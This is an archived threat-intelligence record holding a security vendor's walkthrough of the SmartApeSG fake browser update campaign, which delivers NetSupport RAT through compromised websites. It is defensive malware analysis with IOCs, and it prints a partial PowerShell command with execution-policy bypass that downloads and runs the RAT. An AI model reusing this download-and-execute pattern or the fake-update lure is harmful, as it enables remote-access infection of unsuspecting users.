{
	"id": "0413920c-6b2b-4bed-8975-29193b56b1f4",
	"created_at": "2026-04-06T00:22:03.097598Z",
	"updated_at": "2026-04-10T13:11:53.391709Z",
	"deleted_at": null,
	"sha1_hash": "29ed1571bd06795566632bc946dd7c3a98bfa9f2",
	"title": "SmartApeSG walkthrough",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1228294,
	"plain_text": "SmartApeSG walkthrough\r\nBy Jerome Segura\r\nPublished: 2024-06-11 · Archived: 2026-04-05 20:08:55 UTC\r\nIn this walkthrough, we test SmartApeSG, a malware campaign distributed via compromised sites.\r\nSmartApeSG, tested on June 11, 2024\r\nDistribution\r\nSocial engineering attacks via fake browser updates are increasingly common. Criminals inject code into\r\ncompromised websites, which then present unsuspecting website users with malware downloads disguised as\r\nbrowser updates. With little effort, threat actors can trick victims into executing malicious code and gain initial\r\naccess to their machines.\r\nAbout one year ago, a new social engineering variant joined the fake browser updates club. We named it\r\nSmartApeSG (AKA ZPHP, HANEYMANEY) in reference to its hosting provider (SmartApe) and of course\r\nSocGholish which started it all. Like its counterparts, it leverages compromised websites to load a fake browser\r\nupdate template. Victims are tricked into executing a file that will eventually download NetSupport RAT.\r\nTo start replaying this threat, we looked for previous indicators of compromise, in particular one of the domains\r\nthat is being injected into legitimate websites. To change things up a little bit, we set Microsoft Edge as our default\r\nbrowser and visited one of those sites. After a few seconds, the page was hijacked and replaced with the following\r\ntemplate:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 1 of 12\n\nThe overlay reads “You are using an older version of Edge” (that template is adapted based on your browser). It\r\nlooks real, so much so that users will want to do the right thing and download this update.\r\nArticle continues below this ad.\r\nWhen we click on the ‘Update Edge’ button, it downloads a zip archive with the following naming convention:\r\nUpdate – [0-9]{5}.zip. After we extract the content of that archive, we see a main JavaScript file that has the static\r\nname Update 124.0.6367.158.js (at least for the current campaign) and a folder called Install, itself containing\r\nnumerous ‘.dat’ files.\r\nThe file that victims will run is the JavaScript one, the others are there just for noise and to confuse security\r\nproducts. If you were to look at that file (it is over 20MB), you wouldn’t see a lot other than what appears to be a\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 2 of 12\n\nlegitimate library:\r\nThere is malicious code in there, which we will cover a little bit later. For now, we simply execute the script by\r\ndouble-clicking on it. Not much actually happens, no installer screen or message indicating that the browser has\r\nbeen updated. If you reload the website you are on, it will display normally this time, which is perhaps enough of\r\na trick.\r\nProcess flow\r\nIn the background, the script spawns a new PowerShell command responsible for downloading and executing the\r\npayload as client32.exe (NetSupport RAT):\r\n\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\admin\\Downloads\\Update 124.0.6367.158.js\"\r\n \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -Ex Bypass -NoP -C $YLHTCF='http://ps\r\n \"C:\\Users\\admin\\AppData\\Roaming\\OAPWDYLP10\\client32.exe\"\r\nThis process flow is not exactly showing us what happens when we execute the malicious JavaScript. If we look\r\nat the network activity (more on this in the next section), we see that wscript.exe is contacting the same remote\r\ndomain that served the template at the following URL: elvesofiax[.]com/cdn-vs/22per.php?[4digitid]\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 3 of 12\n\nThe server sends back a response that is 7.9MB. If we open in a text editor, it looks like the same library we had\r\nfrom earlier, but with a notable difference: At the very end of the file is a gigantic blurb of encoded data:\r\nThis is interesting because it means the original script (Update 124.0.6367.158.js) was just setting the stage and\r\nthis second one is the one that actually contains the malicious instructions. Using an online deobfuscator, we can\r\nnow expose the PowerShell command:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 4 of 12\n\nThe next steps in the infection process are for PowerShell to retrieve the final payload (NetSupport RAT) from the\r\nremote host psk777[.]casa:\r\nThis time we get a giant (10.1MB) Base64 encoded string that decodes to a zip archive. These are the NetSupport\r\nRAT files:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 5 of 12\n\nNetwork summary\r\nSmartApeSG network traffic captured by mitmproxy, rules from fiddleitm:\r\nPost execution traffic (Wireshark):\r\nProtection\r\nWhen we first executed this payload, ThreatDown was already blocking the malicious domain hosting the fake\r\ntemplate and the NetSupport RAT payload:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 6 of 12\n\nIn order to see what EDR would record, we disabled all protections to let the attack happen without any\r\nimpediments. The process graph summarizes the events that happened on the victim’s endpoint. In this case, we\r\nran the script directly from the Downloads folder and let execution happen:\r\nThese are the events that were captured:\r\nJavasScript execution:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 7 of 12\n\nPowerShell execution:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 8 of 12\n\nNetSupport RAT downloaded and runs from folder within %appdata%:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 9 of 12\n\nPersistence achieved via an autorun registry key:\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 10 of 12\n\nMitigations\r\nWe did not run the payload long enough to see what happens next, but it is likely that the infected endpoint would\r\nbe remotely accessed by a malicious actor for further assessment.\r\nIt was interesting to see how the threat actors were using a two stage scripting flow to invoke PowerShell. This\r\ngives them more flexibility to change their payload’s location, as well as possibly bypass detection from security\r\nengines.\r\nA solid network-based defense will keep SmartApeSG away from your users, and EDR will also give you great\r\nvisibility into the attack chain. Finally, it’s important to remember that these incidents are often the precursor to\r\ndata theft or ransomware.\r\nDid you like this walkthough? For more, check out our index page here.\r\nIndicators of Compromise (IOCs)\r\nSample\r\n4cf69758cb191de3edc2030019c3bb0c56346de4e85b6badcce9aba8a23706fa\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 11 of 12\n\nSmartApeSG infrastructure (now on Stark Industries)\r\nelvesofiax[.]com\r\n45.150.65[.]147\r\nSecond JavaScript\r\nelvesofiax[.]com/cdn-vs/22per.php\r\nNetSupport RAT host\r\npsk777[.]casa\r\nNetSupport RAT C2\r\n94.158.245[.]103\r\nSource: https://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nhttps://www.threatdown.com/blog/smartapesg-06-11-2024/\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.threatdown.com/blog/smartapesg-06-11-2024/"
	],
	"report_names": [
		"smartapesg-06-11-2024"
	],
	"threat_actors": [],
	"ts_created_at": 1775434923,
	"ts_updated_at": 1775826713,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/29ed1571bd06795566632bc946dd7c3a98bfa9f2.pdf",
		"text": "https://archive.orkl.eu/29ed1571bd06795566632bc946dd7c3a98bfa9f2.txt",
		"img": "https://archive.orkl.eu/29ed1571bd06795566632bc946dd7c3a98bfa9f2.jpg"
	}
}